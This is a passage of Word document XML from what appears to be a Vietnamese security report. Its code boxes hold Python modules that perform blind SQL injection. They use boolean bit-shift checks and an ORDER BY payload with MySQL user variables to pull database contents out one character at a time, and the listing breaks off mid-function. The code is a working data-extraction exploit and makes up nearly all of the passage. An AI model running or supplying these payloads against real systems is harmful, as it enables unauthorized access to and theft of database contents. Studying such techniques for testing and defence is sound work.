            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>"currentSetting"</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>None,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>"required"</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>True,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>"description"</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>"Pattern to check True/False"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>}</w:t>
            </w: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tmp </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>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for i in reversed(range(0, 7)):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>if(self.checkQuery("and (((length({0})&gt;&gt;{1}) mod 2)=1)".format(query, i))):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># bit i is 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>self.logger.debug("Bit {0} is 1".format(i))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">tmp </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>tmp + pow(2,i)</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self.logger.debug("Bit {0} is 0".format(i))</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tmp</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lastRenderedPageBreak/>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 Bit shift</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 Single character</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">tmp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r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>for j in reversed(range(0, 7)):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>if(self.checkQuery(" and (((ascii(substr({0},{1},1))&gt;&gt;{2}) mod 2)=1)".format(query, (i+1),j)) == Tru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self.logger.debug("Bit {0} is 1".format(j))</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tmp </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>tmp + pow(2,j)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">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self.logger.debug("Bit {0} is 0".format(j))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>self.logger.info("Found character number {0} is: {1}".format(i+1, chr(tmp)))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">self.result </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>+=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>chr(tmp)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># Second get result</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>def checkQuery(self, payload):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># Return true/false of query</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># If contain, return True, if not, return False</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># Or use regex</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if(r.text.find(self.basicOptions["PATTERN"]["currentSetting"]) &gt; 0):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>return Tru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return False</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:lastRenderedPageBreak/>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tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="00FC6730">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="_Toc459822532"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Module Blind SQL injection sử dụng Order by</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>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order by"</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self.standard_dict = {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>1:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>'Nguyen Van A',</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>2:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>'Tran Van B',</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>3:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>'Le Thi C',</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>4:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>'Le Thanh D',</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>5:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>'Nguyen Tien E',</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>6:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>'Vo Thanh F',</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>7:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>'Le Tien G',</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>8:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>'Tran Van H',</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>9:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>'Pham Thuy K',</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pP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payload </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>= "order by (select if((@hbn:=@hbn%2b1)&lt;10,if(@hbn=1,1,if((select length(({0}))) %26 pow(2,@hbn-2) &gt; 0,@hbn,-@hbn)),1000) from  (select @hbn:=0) as t)".format(query)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>self.resultLength = (self.getQueryResult(payload))</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payload =</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>"order by (select if((@hbn:=@hbn%2b1)&lt;10,if(@hbn=1,1,if((select ascii(substring(({0}),{1},1))) %26 pow(2,@hbn-2) &gt; 0,@hbn,-@hbn)),1000) from  (select @hbn:=0) as t)".format(query, i+1)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>tmp = (self.getQueryResult(payload))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>self.logger.info("Found character number {0} is: {1}".format(i+1, chr(tmp)))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">self.result </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>+=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>chr(tmp)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>def getQueryResult(self, payload):</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 xml:space="preserve">resultText </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>r.text</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>pos1 = resultText.find(self.standard_dict[1])</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>post_dict = {}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>for i in range(2,10):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>pos = resultText.find(self.standard_dict[i])</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>if pos &lt; pos1:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>#Before 1 ==&gt; -@hbn ==&gt; 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>post_dict[i] = 0</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post_dict[i] = 1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>s = 0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>for i in range(9,1,-1):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
